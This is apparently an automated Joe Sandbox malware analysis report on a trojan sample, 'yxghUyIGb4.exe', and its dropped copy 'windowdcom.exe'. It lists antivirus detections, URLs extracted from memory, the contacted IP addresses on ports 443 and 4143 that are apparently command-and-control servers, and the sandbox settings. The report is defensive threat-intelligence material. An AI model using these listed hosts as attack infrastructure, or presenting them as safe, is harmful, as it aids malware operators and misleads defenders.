                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    1.0.yxghUyIGb4.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.0.windowdcom.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.0.yxghUyIGb4.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    3.0.windowdcom.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    3.2.windowdcom.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.yxghUyIGb4.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.2.windowdcom.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.yxghUyIGb4.exe.820000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://178.62.39.238:443/3%VirustotalBrowse
                    http://178.62.39.238:443/0%Avira URL Cloudsafe
                    https://167.114.153.153/4%VirustotalBrowse
                    https://167.114.153.153/0%Avira URL Cloudsafe
                    http://Passport.NET/tbpose0%Avira URL Cloudsafe
                    https://178.62.39.238:443/5%VirustotalBrowse
                    https://178.62.39.238:443/0%Avira URL Cloudsafe
                    http://37.187.4.178/0%Avira URL Cloudsafe
                    http://71.244.60.231:4143/E0%Avira URL Cloudsafe
                    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                    http://79.172.249.82:443//50%Avira URL Cloudsafe
                    http://71.244.60.231:4143/%0%Avira URL Cloudsafe
                    http://cps.letsencrypt.org00%URL Reputationsafe
                    http://cps.letsencrypt.org00%URL Reputationsafe
                    http://cps.letsencrypt.org00%URL Reputationsafe
                    http://passport.net/tb0%Avira URL Cloudsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd0%Avira URL Cloudsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    http://79.172.249.82:443//0%Avira URL Cloudsafe
                    http://71.244.60.231:4143/0%Avira URL Cloudsafe
                    http://79.172.249.82:443/=0%Avira URL Cloudsafe
                    http://80.82.115.164:4143/-0%Avira URL Cloudsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://178.62.39.238:443//0%Avira URL Cloudsafe
                    https://79.172.249.82:443/0%Avira URL Cloudsafe
                    https://167.114.153.153/V0%Avira URL Cloudsafe
                    https://watson.telemet43/0%Avira URL Cloudsafe
                    http://79.172.249.82:443/p%0%Avira URL Cloudsafe
                    http://80.82.115.164:4143/50%Avira URL Cloudsafe
                    http://Passport.NET/STS0%Avira URL Cloudsafe
                    http://r3.i.lencr.org/0-0%Avira URL Cloudsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://79.172.249.82:443/0%Avira URL Cloudsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://186.103.199.252:4143/0%Avira URL Cloudsafe
                    http://79.172.249.82:443/3.94.198:4143/0%Avira URL Cloudsafe
                    http://71.244.60.231:4143/AES0%Avira URL Cloudsafe
                    https://activity.windows.comr0%URL Reputationsafe
                    https://activity.windows.comr0%URL Reputationsafe
                    https://activity.windows.comr0%URL Reputationsafe
                    http://167.114.153.153/0%Avira URL Cloudsafe
                    http://80.82.115.164:4143/0%Avira URL Cloudsafe
                    https://account.livex0%Avira URL Cloudsafe
                    http://159.203.94.198:4143/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://178.62.39.238:443/false
                    • 5%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://79.172.249.82:443/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://167.114.153.153/false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/02/sc_0svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                      		high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                        		high
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdHsvchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpfalse
                          		high
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdPsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                            		high
                            http://178.62.39.238:443/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                            • 3%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                              		high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                		high
                                https://167.114.153.153/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                • 4%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://Passport.NET/tbposesvchost.exe, 0000001B.00000002.1211409705.00000148F1A02000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                      		high
                                      http://37.187.4.178/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://71.244.60.231:4143/Ewindowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                        		high
                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.bingmapsportal.comsvchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpfalse
                                            		high
                                            http://cps.root-x1.letsencrypt.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://79.172.249.82:443//5windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmpfalse
                                              		high
                                              http://71.244.60.231:4143/%windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://cps.letsencrypt.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/sc2svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://account.live.com/msangcwamsvchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://passport.net/tbsvchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://%s.xboxlive.comsvchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		low
                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsdsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dynamic.tsvchost.exe, 00000009.00000002.308083238.0000020842064000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/02/sconsvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://79.172.249.82:443//windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://71.244.60.231:4143/windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://79.172.249.82:443/=windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustpi7svchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-svchost.exe, 0000001B.00000002.1210212208.00000148F0C7F000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://80.82.115.164:4143/-windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.misvchost.exe, 0000001B.00000003.817470104.00000148F1357000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://178.62.39.238:443//windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/scRLsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scrsvchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scc8=svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://167.114.153.153/Vwindowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://watson.telemet43/windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://79.172.249.82:443/p%windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://80.82.115.164:4143/5windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601Isvchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://Passport.NET/STSsvchost.exe, 0000001B.00000003.813605285.00000148F132E000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 0000001B.00000003.1209653226.00000148F0C5A000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://r3.i.lencr.org/0-windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://r3.o.lencr.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://79.172.249.82:443/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp, windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813609882.00000148F1331000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://wellformedweb.org/CommentAPI/svchost.exe, 0000001D.00000002.961089640.0000021C5EF30000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://186.103.199.252:4143/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://79.172.249.82:443/3.94.198:4143/windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://71.244.60.231:4143/AESwindowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://activity.windows.comrsvchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.823013548.00000148F1332000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.817546441.00000148F1362000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://80.82.115.164:4143/windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://account.livexsvchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://159.203.94.198:4143/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                178.62.39.238
                                                                                                                                                		unknownEuropean Union
                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                80.86.91.232
                                                                                                                                                		unknownGermany
                                                                                                                                                		8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                173.230.145.224
                                                                                                                                                		unknownUnited States
                                                                                                                                                		63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                167.114.153.153
                                                                                                                                                		unknownCanada
                                                                                                                                                		16276OVHFRfalse
                                                                                                                                                37.187.4.178
                                                                                                                                                		unknownFrance
                                                                                                                                                		16276OVHFRfalse
                                                                                                                                                79.172.249.82
                                                                                                                                                		unknownHungary
                                                                                                                                                		43711SZERVERNET-HU-ASHUfalse
                                                                                                                                                193.169.54.12
                                                                                                                                                		unknownGermany
                                                                                                                                                		49464ICFSYSTEMSDEfalse
                                                                                                                                                71.244.60.231
                                                                                                                                                		unknownUnited States
                                                                                                                                                		5650FRONTIER-FRTRUSfalse
                                                                                                                                                159.203.94.198
                                                                                                                                                		unknownUnited States
                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                80.82.115.164
                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                		41357UK-34SP-ASGBfalse
                                                                                                                                                186.103.199.252
                                                                                                                                                		unknownChile
                                                                                                                                                		15311TelefonicaEmpresasCLfalse

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.1
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                Analysis ID:377029
                                                                                                                                                Start date:28.03.2021
                                                                                                                                                Start time:19:27:41
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 13m 1s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:yxghUyIGb4 (renamed file extension from none to exe)
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:35
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal96.troj.evad.winEXE@17/8@0/13
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 42.9% (good quality ratio 39.3%)
                                                                                                                                                • Quality average: 79%
                                                                                                                                                • Quality standard deviation: 30.4%
                                                                                                                                                HCA Information:Failed
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, wermgr.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, UsoClient.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.200, 13.107.21.200, 104.43.193.48, 52.255.188.83, 13.88.21.125, 104.43.139.144, 20.82.210.154, 184.30.24.56, 104.42.151.234, 51.103.5.159, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 20.190.160.129, 20.190.160.8, 20.190.160.2, 20.190.160.69, 20.190.160.75, 20.190.160.71, 20.190.160.132, 20.190.160.4, 93.184.220.29, 20.54.26.129, 40.126.31.8, 40.126.31.141, 40.126.31.139, 20.190.159.132, 40.126.31.143, 40.126.31.1, 20.190.159.136, 40.126.31.6, 40.127.240.158, 52.137.106.217, 20.49.150.241
